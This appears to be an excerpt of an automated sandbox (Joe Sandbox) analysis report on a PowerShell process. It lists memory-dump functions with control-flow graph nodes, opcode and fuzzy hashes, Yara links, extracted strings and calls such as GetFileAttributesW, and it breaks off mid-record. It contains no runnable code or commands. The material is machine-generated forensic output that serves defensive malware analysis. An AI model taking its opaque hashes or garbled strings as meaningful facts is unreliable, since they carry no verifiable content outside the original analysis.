c54c62 53352->53353 53354 c54c87 53353->53354 53362 c54d10 53353->53362 53367 c54d0f 53353->53367 53354->53349 53358 c54c62 53357->53358 53359 c54c87 53358->53359 53360 c54d10 GetFileAttributesW 53358->53360 53361 c54d0f GetFileAttributesW 53358->53361 53359->53349 53360->53359 53361->53359 53363 c54d23 53362->53363 53372 c54d88 53363->53372 53378 c54d78 53363->53378 53364 c54d41 53364->53354 53368 c54d23 53367->53368 53370 c54d88 GetFileAttributesW 53368->53370 53371 c54d78 GetFileAttributesW 53368->53371 53369 c54d41 53369->53354 53370->53369 53371->53369 53373 c54d9d 53372->53373 53374 c54ea5 53373->53374 53375 c54e63 53373->53375 53377 c56790 GetFileAttributesW 53373->53377 53374->53364 53375->53374 53376 c56790 GetFileAttributesW 53375->53376 53376->53374 53377->53375 53380 c54d9d 53378->53380 53379 c54ea5 53379->53364 53380->53379 53381 c54e63 53380->53381 53383 c56790 GetFileAttributesW 53380->53383 53381->53379 53382 c56790 GetFileAttributesW 53381->53382 53382->53379 53383->53381 53384 82c0141 53385 82c0149 53384->53385 53387 7cb4b08 GetFileAttributesW 53385->53387 53389 7cb4b07 GetFileAttributesW 53385->53389 53390 7cb4bcf 53385->53390 53386 82c01ba 53387->53386 53389->53386 53391 7cb4bd4 53390->53391 53392 7cb5d09 GetFileAttributesW 53391->53392 53393 7cb4cb7 53391->53393 53394 7cb5ea1 GetFileAttributesW 53391->53394 53395 7cb5fb4 GetFileAttributesW 53391->53395 53396 7cb6244 GetFileAttributesW 53391->53396 53392->53393 53393->53386 53394->53393 53395->53393 53396->53393

                                  Executed Functions

                                  Function 07C6C3E0 Relevance: 4.0, Strings: 3, Instructions: 279COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 138 7c6c3e0-7c6c3fb 140 7c6c401-7c6c420 call 7c67f48 138->140 141 7c6c5f9-7c6c609 138->141 150 7c6c422-7c6c425 140->150 151 7c6c42e-7c6c431 140->151 142 7c6c60f-7c6c615 141->142 143 7c6c718-7c6c73d 141->143 142->143 144 7c6c61b-7c6c637 142->144 164 7c6c73f-7c6c746 143->164 160 7c6c6d6-7c6c716 call 7c6b438 144->160 161 7c6c63d-7c6c65a 144->161 153 7c6c477-7c6c47f 150->153 154 7c6c427-7c6c42a 150->154 156 7c6c433-7c6c436 151->156 157 7c6c438-7c6c472 151->157 167 7c6c487 153->167 154->153 159 7c6c42c 154->159 156->157 162 7c6c48c-7c6c490 156->162 157->164 159->162 160->164 187 7c6c672-7c6c6d4 161->187 188 7c6c65c-7c6c662 161->188 165 7c6c496-7c6c4ae 162->165 166 7c6c53d-7c6c565 162->166 180 7c6c4c6-7c6c51d 165->180 181 7c6c4b0-7c6c4b6 165->181 197 7c6c567-7c6c56d 166->197 198 7c6c57d-7c6c5c5 166->198 167->162 167->164 214 7c6c523-7c6c538 180->214 215 7c6c749-7c6c760 180->215 185 7c6c4ba-7c6c4bc 181->185 186 7c6c4b8 181->186 185->180 186->180 187->164 190 7c6c666-7c6c668 188->190 191 7c6c664 188->191 190->187 191->187 200 7c6c571-7c6c573 197->200 201 7c6c56f 197->201 213 7c6c5cd-7c6c5f4 198->213 200->198 201->198 213->164 214->213
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ^]k$^]k$^]k
                                  • API String ID: 0-3366670140
                                  • Opcode ID: 57ea4b91a00f36e384e02fba39c7a9e70c9fe6672424bd0991ee842367c0ec1a
                                  • Instruction ID: f6e2e95da515e7935061b4648ec4099dea48d685ee4f5000c67eec463c52a2aa
                                  • Opcode Fuzzy Hash: 57ea4b91a00f36e384e02fba39c7a9e70c9fe6672424bd0991ee842367c0ec1a
                                  • Instruction Fuzzy Hash: 80A1D4B47002009FDB28DB7984D967EB7A7AFC9301B148429E556DB394CF39ED02CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C64481 Relevance: 2.0, Instructions: 2021COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 522 7c64481-7c65334 733 7c6533c-7c66724 522->733
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad8a466a112897ffe2836513d978dd4ad9b97f10687eea3f149a2e1d80620c51
                                  • Instruction ID: 97a859507168774cdf626c442dfc7595ff6fd9316efdff27d995b04f136d4b6c
                                  • Opcode Fuzzy Hash: ad8a466a112897ffe2836513d978dd4ad9b97f10687eea3f149a2e1d80620c51
                                  • Instruction Fuzzy Hash: A2031774B41314DFEB29AB3498167AD77B2BB85701F2044BDA50AAF3D0DB76A981CF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB78B0 Relevance: 2.0, Strings: 1, Instructions: 719COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 930 7cb78b0-7cb78d2 931 7cb78d8-7cb78ec 930->931 932 7cb7c26-7cb7c3d 930->932 933 7cb78ee-7cb7904 call 7cb5370 931->933 934 7cb790c-7cb791b 931->934 946 7cb7c44-7cb7ce6 932->946 933->934 938 7cb791d-7cb7922 934->938 939 7cb7924 934->939 942 7cb7926-7cb7928 938->942 939->942 944 7cb792a-7cb7934 942->944 945 7cb7967-7cb797d call 7cb67e8 942->945 947 7cb7936-7cb794c call 7cb5370 944->947 948 7cb7954-7cb7964 944->948 952 7cb7b5d-7cb7b67 945->952 953 7cb7983-7cb79b2 945->953 996 7cb7ce8-7cb7cfc 946->996 997 7cb7d02-7cb7d19 946->997 947->948 948->945 957 7cb7b69-7cb7b7f call 7cb5370 952->957 958 7cb7b87-7cb7b94 952->958 970 7cb79d2-7cb7b3c call 7cb6948 953->970 971 7cb79b4-7cb79ca call 7cb5370 953->971 957->958 965 7cb7b9c-7cb7ba3 958->965 968 7cb7bac 965->968 969 7cb7ba5-7cb7baa 965->969 974 7cb7bae-7cb7bb0 968->974 969->974 970->965 986 7cb7b3e-7cb7b5b 970->986 971->970 974->946 976 7cb7bb6-7cb7bfc 974->976 1133 7cb7bff call 7cb7d58 976->1133 1134 7cb7bff call 7cb782e 976->1134 1135 7cb7bff call 7cb79f1 976->1135 1136 7cb7bff call 7cb78b0 976->1136 1137 7cb7bff call 7cb7354 976->1137 986->965 992 7cb7c05-7cb7c23 1002 7cb7cfe-7cb7d01 996->1002 1003 7cb7d20-7cb7d5d 996->1003 997->1003 1009 7cb7d68-7cb7dac 1003->1009 1010 7cb7d5f-7cb7d67 1003->1010 1015 7cb828f-7cb82a6 1009->1015 1016 7cb7db2-7cb7db6 1009->1016 1022 7cb82ad-7cb82c4 1015->1022 1017 7cb7db8-7cb7dbd 1016->1017 1018 7cb7dbf 1016->1018 1020 7cb7dc1-7cb7dc3 1017->1020 1018->1020 1021 7cb7dc9-7cb7dd1 1020->1021 1020->1022 1024 7cb7ddf 1021->1024 1025 7cb7dd3-7cb7ddd 1021->1025 1041 7cb82cb-7cb82df 1022->1041 1026 7cb7de4-7cb7de6 1024->1026 1025->1026 1028 7cb7de8-7cb7dfb 1026->1028 1029 7cb7e15-7cb7e1b 1026->1029 1028->1029 1042 7cb7dfd-7cb7e13 1028->1042 1030 7cb7e1d-7cb7e34 1029->1030 1031 7cb7e36-7cb7e42 1029->1031 1030->1031 1033 7cb7e48-7cb7e4c 1031->1033 1034 7cb817f-7cb8181 1031->1034 1039 7cb7e52-7cb7e59 1033->1039 1040 7cb82e6-7cb8336 1033->1040 1036 7cb818f 1034->1036 1037 7cb8183-7cb818d 1034->1037 1043 7cb8194-7cb8196 1036->1043 1037->1043 1044 7cb7e5b-7cb7e5e 1039->1044 1045 7cb7e64-7cb7ea2 1039->1045 1041->1040 1042->1029 1049 7cb8198-7cb81b1 1043->1049 1050 7cb81b3-7cb81c4 1043->1050 1044->1045 1052 7cb8166-7cb816a 1044->1052 1045->1034 1049->1050 1061 7cb81ca-7cb81fa 1050->1061 1062 7cb825e-7cb828c 1050->1062 1052->1034 1053 7cb816c-7cb8179 1052->1053 1053->1034 1064 7cb7ea7-7cb7eae 1053->1064 1138 7cb81fc call 7cb8818 1061->1138 1139 7cb81fc call 7cb8810 1061->1139 1064->1041 1067 7cb7eb4-7cb7ed8 1064->1067 1075 7cb7eda-7cb7ede 1067->1075 1076 7cb7eff 1067->1076 1070 7cb8202-7cb8206 1073 7cb8208-7cb8212 1070->1073 1074 7cb8214 1070->1074 1077 7cb8219-7cb821b 1073->1077 1074->1077 1075->1040 1078 7cb7ee4-7cb7eeb 1075->1078 1079 7cb7f01-7cb7f08 1076->1079 1080 7cb8258 1077->1080 1081 7cb821d-7cb8233 1077->1081 1082 7cb7ef8-7cb7efd 1078->1082 1083 7cb7eed-7cb7ef6 1078->1083 1084 7cb7f0e-7cb7f10 1079->1084 1085 7cb8095-7cb80a6 1079->1085 1080->1062 1092 7cb8235-7cb8252 1081->1092 1093 7cb8254-7cb8256 1081->1093 1082->1079 1083->1079 1084->1085 1086 7cb7f16-7cb7f18 1084->1086 1094 7cb80a8-7cb80ae 1085->1094 1095 7cb80b3-7cb80c4 1085->1095 1089 7cb7f1a-7cb7f24 1086->1089 1090 7cb7f26 1086->1090 1091 7cb7f2b-7cb7f2d 1089->1091 1090->1091 1096 7cb7f4f-7cb7f70 1091->1096 1097 7cb7f2f-7cb7f4d 1091->1097 1092->1062 1093->1062 1094->1034 1102 7cb80dd-7cb811a 1095->1102 1103 7cb80c6-7cb80d7 1095->1103 1104 7cb7fab-7cb7fcf 1096->1104 1105 7cb7f72-7cb7fa0 1096->1105 1097->1096 1115 7cb811c-7cb8149 1102->1115 1116 7cb8154-7cb8158 1102->1116 1103->1102 1109 7cb815a-7cb815e 1103->1109 1111 7cb800a-7cb800e 1104->1111 1112 7cb7fd1-7cb7fff 1104->1112 1105->1104 1109->1034 1114 7cb8160-7cb8164 1109->1114 1111->1034 1117 7cb8014-7cb8018 1111->1117 1112->1111 1114->1034 1114->1052 1115->1116 1116->1034 1116->1109 1117->1040 1120 7cb801e-7cb8025 1117->1120 1122 7cb802c-7cb803d 1120->1122 1123 7cb8027-7cb802a 1120->1123 1125 7cb803f-7cb804c 1122->1125 1123->1122 1123->1125 1128 7cb804e-7cb807b 1125->1128 1129 7cb8086-7cb808a 1125->1129 1128->1129 1129->1052 1130 7cb8090 1129->1130 1130->1034 1133->992 1134->992 1135->992 1136->992 1137->992 1138->1070 1139->1070
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: U
                                  • API String ID: 0-3372436214
                                  • Opcode ID: 9bde31627e642b791c65cf5a7c628780a6fa3cc284afe42954b84c9acd886cdb
                                  • Instruction ID: 3c5395235e1faa51fc979241dce20b08cbec52a308ef8891f0612b80ddf3dcf1
                                  • Opcode Fuzzy Hash: 9bde31627e642b791c65cf5a7c628780a6fa3cc284afe42954b84c9acd886cdb
                                  • Instruction Fuzzy Hash: 3A429D74A002059FCB25DF64C584BAE77E6EF88301F158469E90AEB395DB38ED41CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00C5A648 Relevance: 1.7, Instructions: 1718COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1202 c5a648-c5a660 1205 c5a620-c5a63c 1202->1205 1206 c5a662-c5b9cf call c522a8 1202->1206 1205->1202 1465 c5b9db-c5b9ee 1206->1465 1654 c5b9ee call c5dc28 1465->1654 1655 c5b9ee call c5dc38 1465->1655 1467 c5b9f4-c5b9f7 1468 c5ba00 1467->1468 1469 c5b9f9-c5b9fe 1467->1469 1470 c5ba07-c5ba3b 1468->1470 1469->1470 1473 c5ba45-c5ba51 1470->1473 1474 c5ba5d-c5bb4c 1473->1474 1486 c5bb58 1474->1486 1487 c5bb60-c5bd80 1486->1487 1513 c5bd8a-c5bd96 1487->1513 1514 c5bda2-c5c792 call c570c0 1513->1514 1654->1467 1655->1467
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1674202757.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_c50000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c19ca7423082b69a6835b685a7ac831ca27f743cfc44540c89b3d7ddc28f356e
                                  • Instruction ID: 92972a1858c5febf9b69ada77ccd2c2d87e9248f547b1596e76767bdeae76e4d
                                  • Opcode Fuzzy Hash: c19ca7423082b69a6835b685a7ac831ca27f743cfc44540c89b3d7ddc28f356e
                                  • Instruction Fuzzy Hash: CC034C38A002188FDB65DB60D851BEEB777FB88345F1180A9E509AB798CF356D81CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB4EA8 Relevance: .4, Instructions: 391COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bf116021d24dd62d9d8f57807d276019f2c2e106e061bae3908df866d230e47c
                                  • Instruction ID: 1556530a976f1cb331e0335db18df2674b3894785b3ac0685aa778a42a6a8a29
                                  • Opcode Fuzzy Hash: bf116021d24dd62d9d8f57807d276019f2c2e106e061bae3908df866d230e47c
                                  • Instruction Fuzzy Hash: DBD1DF70B052499FCB18DFB5D8546AEBBB2EFC5300F154469EA06EB390DB34AD06CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBC21B Relevance: 4.0, Strings: 3, Instructions: 243COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 223 7cbc21b-7cbc27d call 7cb92b8 call 7cbc883 229 7cbc283-7cbc2a9 call 7cb92b8 223->229 233 7cbc2ab-7cbc2b8 229->233 234 7cbc2ba 229->234 235 7cbc2bf-7cbc2c1 233->235 234->235 236 7cbc5f1-7cbc5fb 235->236 237 7cbc2c7-7cbc2dd 235->237 239 7cbc2df-7cbc2ec 237->239 240 7cbc2ee-7cbc303 237->240 239->240 243 7cbc305-7cbc312 240->243 244 7cbc314-7cbc323 240->244 243->244 244->236 247 7cbc329-7cbc33d 244->247 249 7cbc33f-7cbc34d 247->249 250 7cbc362-7cbc36d 247->250 249->250 253 7cbc34f-7cbc35f 249->253 254 7cbc37f-7cbc397 250->254 255 7cbc36f-7cbc37a call 7cb92b8 250->255 253->250 260 7cbc399-7cbc3a3 254->260 261 7cbc3a5 254->261 255->236 262 7cbc3aa-7cbc3ac 260->262 261->262 263 7cbc3b9-7cbc3d7 262->263 264 7cbc3ae-7cbc605 262->264 268 7cbc3e9-7cbc3f3 263->268 269 7cbc3d9-7cbc3e7 263->269 272 7cbc3f5-7cbc3f7 268->272 269->268 269->272 273 7cbc409-7cbc470 272->273 274 7cbc3f9-7cbc407 272->274 273->236 274->273 277 7cbc475-7cbc493 274->277 282 7cbc4b1-7cbc517 277->282 283 7cbc495-7cbc4ac 277->283 282->236 283->236
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4<]k$l8]k$l8]k
                                  • API String ID: 0-526888064
                                  • Opcode ID: 84a4bd4fdf883ff3793f5ba49dbb94b9b777983ee9c2a74d03e77231c3c3351d
                                  • Instruction ID: a8a6513cfc0d2e13e9177bd8ddec054d76d8695ac4ef7955ca6247199f795994
                                  • Opcode Fuzzy Hash: 84a4bd4fdf883ff3793f5ba49dbb94b9b777983ee9c2a74d03e77231c3c3351d
                                  • Instruction Fuzzy Hash: 43915974B006058FDB249BB8D494AEEB7F6AF88310F558429E902EB390DF35DD068F61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3AD38 Relevance: 2.8, Strings: 2, Instructions: 257COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 299 7d3ad38-7d3ad87 304 7d3adeb-7d3adf1 299->304 305 7d3ad89-7d3ada5 299->305 306 7d3adf3-7d3ae00 304->306 307 7d3ae08-7d3ae8f 304->307 305->304 312 7d3ada7-7d3ade8 305->312 306->307 327 7d3ae96-7d3aebd 307->327 331 7d3af3a-7d3af49 327->331 332 7d3aebf-7d3aee0 327->332 335 7d3b0b3-7d3b0ba 331->335 336 7d3af4f-7d3af63 331->336 343 7d3af13-7d3af2c 332->343 344 7d3aee2-7d3af11 332->344 339 7d3af65-7d3af67 336->339 340 7d3af69 336->340 342 7d3af6c-7d3af96 339->342 340->342 354 7d3b036-7d3b04f 342->354 355 7d3af9c-7d3afa9 342->355 348 7d3af37 343->348 349 7d3af2e 343->349 344->343 348->331 349->348 358 7d3b051 354->358 359 7d3b05a 354->359 361 7d3afb7 355->361 362 7d3afab-7d3afb5 355->362 358->359 359->335 363 7d3afbc-7d3afbe 361->363 362->363 364 7d3afc0-7d3afc7 363->364 365 7d3b025-7d3b030 363->365 366 7d3afd2-7d3afe7 364->366 367 7d3afc9-7d3afd0 364->367 365->354 365->355 366->365 367->366 369 7d3afe9-7d3b01d 367->369 369->365
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LR}l$CLe^
                                  • API String ID: 0-3750338765
                                  • Opcode ID: dc3d4d8011b19ccd11f98b4f6e15e189d835d1d5b53f46fbf938709d6ce59c11
                                  • Instruction ID: 866a1fdc7c499f357ec4f939e957e48e0def198953fc06f848dc1e025c3b8c28
                                  • Opcode Fuzzy Hash: dc3d4d8011b19ccd11f98b4f6e15e189d835d1d5b53f46fbf938709d6ce59c11
                                  • Instruction Fuzzy Hash: E2A145B0B002058FCB18DF64D498A6DB7B2FF89315F148569E816EB3A0DB75EC42CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07AE14E8 Relevance: 2.6, Strings: 2, Instructions: 137COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 375 7ae14e8-7ae1509 376 7ae150f-7ae1514 375->376 377 7ae166a-7ae16d2 375->377 378 7ae152c-7ae1538 376->378 379 7ae1516-7ae151c 376->379 386 7ae160e-7ae1618 378->386 387 7ae153e-7ae1541 378->387 380 7ae151e 379->380 381 7ae1520-7ae152a 379->381 380->378 381->378 390 7ae161a-7ae1622 386->390 391 7ae1625-7ae162b 386->391 387->386 389 7ae1547-7ae154e 387->389 389->377 394 7ae1554-7ae1559 389->394 392 7ae162d-7ae162f 391->392 393 7ae1631-7ae163d 391->393 395 7ae163f-7ae1667 392->395 393->395 397 7ae155b-7ae1561 394->397 398 7ae1571-7ae1575 394->398 399 7ae1565-7ae156f 397->399 400 7ae1563 397->400 398->386 402 7ae157b-7ae15a6 398->402 399->398 400->398 410 7ae15ae-7ae160b 402->410
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1751971064.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ae0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: O5$O5
                                  • API String ID: 0-31741633
                                  • Opcode ID: 23b1de8c00e5bb107d1624137371f29ea6fd3eb54d4e8ba50fce4c97a3814497
                                  • Instruction ID: 48fe299dedd86bea8ddf65c1f4312b39756ab81fb536977bc3d7d4c13f31db09
                                  • Opcode Fuzzy Hash: 23b1de8c00e5bb107d1624137371f29ea6fd3eb54d4e8ba50fce4c97a3814497
                                  • Instruction Fuzzy Hash: 064169B57082598FCB15DF68C810AAE7BB2EFC5210F05806AE516CB252DB31DD51CBE2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D36178 Relevance: 2.6, Strings: 2, Instructions: 128COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 412 7d36178-7d36197 415 7d361a0-7d361dc 412->415 416 7d36199-7d3619f 412->416 421 7d361e2-7d361ea 415->421 422 7d36277-7d362d3 415->422 423 7d36206-7d36218 421->423 424 7d361ec-7d36204 421->424 445 7d362d3 call 7d362f0 422->445 446 7d362d3 call 7d362e0 422->446 431 7d36266-7d36276 423->431 432 7d3621a-7d36264 423->432 424->423 424->431 432->431 442 7d362d9-7d362dd 445->442 446->442
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'}l$c}l
                                  • API String ID: 0-3983991366
                                  • Opcode ID: 76a271f0fb508e91716edf9e9796c9107066227efee8f089c74c2d988b199933
                                  • Instruction ID: c828599526ad8c0931c2cc7aa578097557ca4dd5c1104fbd90c2d2ea5c98783b
                                  • Opcode Fuzzy Hash: 76a271f0fb508e91716edf9e9796c9107066227efee8f089c74c2d988b199933
                                  • Instruction Fuzzy Hash: 3A41C2353041005FC704AB78E894A6E77E6EFCA355F1640B9E20ADF3A2DF65DC0587A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07AE125D Relevance: 2.5, Strings: 2, Instructions: 47COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 509 7ae125d-7ae12a0 512 7ae12ba-7ae12bc 509->512 513 7ae12a2-7ae12a8 509->513 516 7ae12c4-7ae12ca 512->516 514 7ae12ac-7ae12b8 513->514 515 7ae12aa 513->515 514->512 515->512 517 7ae12ce-7ae12da 516->517 518 7ae12cc 516->518 520 7ae12dc-7ae12e0 517->520 518->520
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1751971064.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ae0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'}l$4'}l
                                  • API String ID: 0-1014041706
                                  • Opcode ID: 92ce8494d7a682df3c1dfb6893d1137234159351f6db056f86d23b520e2ab0a0
                                  • Instruction ID: e431dba59830bc08e91613400d5cd3c759aab322f5bcf559772e09dd14b1e125
                                  • Opcode Fuzzy Hash: 92ce8494d7a682df3c1dfb6893d1137234159351f6db056f86d23b520e2ab0a0
                                  • Instruction Fuzzy Hash: 6B01DB7670C2558FC366136878262E67BB78FC3161B1A40B7D161DFA52C9608C4683F2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C688AC Relevance: 1.8, Strings: 1, Instructions: 552COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1140 7c688ac-7c688b9 1142 7c68917-7c6891a 1140->1142 1143 7c688bb-7c688f7 1140->1143 1144 7c6891c-7c68958 1142->1144 1145 7c68978-7c68982 1142->1145 1167 7c688fd-7c68912 1143->1167 1168 7c69488-7c69785 call 7c67260 1143->1168 1144->1168 1169 7c6895e-7c68973 1144->1169 1149 7c68984 1145->1149 1150 7c68991-7c689a3 1145->1150 1153 7c6898c 1149->1153 1157 7c689a5-7c689ab 1150->1157 1158 7c689c3 1150->1158 1156 7c69480-7c69487 1153->1156 1157->1158 1160 7c689ad-7c689b3 1157->1160 1161 7c689c8-7c689ca 1158->1161 1160->1158 1163 7c689b5-7c689c1 1160->1163 1165 7c689cc 1161->1165 1166 7c689d9-7c689e6 1161->1166 1163->1161 1172 7c689d4 1165->1172 1174 7c689fc-7c68a1c 1166->1174 1175 7c689e8-7c689f7 1166->1175 1167->1156 1169->1156 1172->1156 1184 7c68a34-7c68af1 1174->1184 1185 7c68a1e-7c68a24 1174->1185 1175->1156 1184->1168 1200 7c68af7-7c68b0c 1184->1200 1187 7c68a26 1185->1187 1188 7c68a28-7c68a2a 1185->1188 1187->1184 1188->1184 1200->1156
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ^]k
                                  • API String ID: 0-1881157740
                                  • Opcode ID: c264f058eaa09d17370464fb69b1a188a01b3994a34484b29f4b27beaa18070b
                                  • Instruction ID: d6ea292e2ec1279b9d0d209d2dbb4a9e341da690b05865c3aaca3bdf1d14449a
                                  • Opcode Fuzzy Hash: c264f058eaa09d17370464fb69b1a188a01b3994a34484b29f4b27beaa18070b
                                  • Instruction Fuzzy Hash: A4126B7429D7D38ED302873C888168EBFD15F57621F280394D1A89B3D7EB29951287EB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00C58138 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(00000000), ref: 00C581B0
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1674202757.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_c50000_powershell.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 059a058edef8c01d4eeebe27bf700068f7ce4f5354311a0af66b54f19ab92717
                                  • Instruction ID: b712ce1e9ea9bed12e19b6864341f670671b9d82203425d4501cbe046195f289
                                  • Opcode Fuzzy Hash: 059a058edef8c01d4eeebe27bf700068f7ce4f5354311a0af66b54f19ab92717
                                  • Instruction Fuzzy Hash: FE2156B5C006599BCB10CF9AD844BDEFBB4BB48720F10811AD818B7240D774AA84CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00C55E64 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(00000000), ref: 00C581B0
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1674202757.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_c50000_powershell.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: de9d4ad549784318050a7801561c7895d73712ea0cb875c68c59466372dc4226
                                  • Instruction ID: 0a066152869380d90645c9a67fcc7abb2c6ce6afa75ef001aa6ec0a9596509f8
                                  • Opcode Fuzzy Hash: de9d4ad549784318050a7801561c7895d73712ea0cb875c68c59466372dc4226
                                  • Instruction Fuzzy Hash: AA2164B1C006599BCB10CFAAD844A9EFBF4FB48320F10811AE819B7300D774AA48CFE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 082CC93B Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SetThreadUILanguage.KERNELBASE ref: 082CC9A2
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1766246868.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_82c0000_powershell.jbxd
                                  Similarity
                                  • API ID: LanguageThread
                                  • String ID:
                                  • API String ID: 243849632-0
                                  • Opcode ID: e9425fc126c2f8ace99587e413a63020f0eebc75d95b2f863a9182d024d6012f
                                  • Instruction ID: b6f1632a6a79b4e1bdefe01bb34116b6f5102c0dd092719905dfb1705c3a84f4
                                  • Opcode Fuzzy Hash: e9425fc126c2f8ace99587e413a63020f0eebc75d95b2f863a9182d024d6012f
                                  • Instruction Fuzzy Hash: 851152B0800688CECB10CF99D484BEEFBF8AF58324F24855ED419A3610C378A940CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 082CBB50 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
